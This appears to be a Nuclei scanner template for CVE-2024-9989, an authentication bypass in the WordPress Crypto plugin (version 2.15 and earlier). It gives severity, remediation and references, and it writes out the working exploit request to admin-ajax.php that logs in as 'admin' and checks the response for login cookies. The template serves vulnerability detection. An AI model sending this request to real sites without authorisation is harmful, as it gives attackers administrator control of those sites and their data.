Crypto <= 2.15 - Authentication Bypass

id: CVE-2024-9989

info:
  name: Crypto <= 2.15 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
  impact: |
    Unauthenticated attackers can bypass authentication to log in as any existing user including administrators if they know the username, gaining complete control of the WordPress site and all its data.
  remediation: |
    Update Crypto plugin to a version later than 2.15 that properly restricts and validates method calls in the crypto_connect_ajax_process function.
  reference:
    - https://github.com/wy876/POC/blob/main/WordPress/WordPress%E6%8F%92%E4%BB%B6Crypto%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CVE-2024-9989).md
    - https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9989
    - https://github.com/advisories/GHSA-hmfh-w3mx-w6j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9989
    cwe-id: CWE-288
    epss-score: 0.07217
    epss-percentile: 0.93534
    cpe: cpe:2.3:a:odude:crypto_tool:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odude
    product: crypto_tool
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/crypto"
    fofa-query: body="wp-content/plugins/crypto"
  tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/crypto")'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: set_cookie
        words:
          - "wordpress_sec_"
          - "wordpress_logged_in_"
        condition: or

      - type: word
        part: body
        words:
          - "error"
          - "false"
          - "success"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e4c40a5ceb3980e322bcb17960ec2f8219a26e3c1a571ae7ccc03d05be4dbda202203683849356589513d5c9ab8726d7114d2c4f08319b185fd85d8a1a476ca5b521:922c64590222798bb761d5b6d8e72950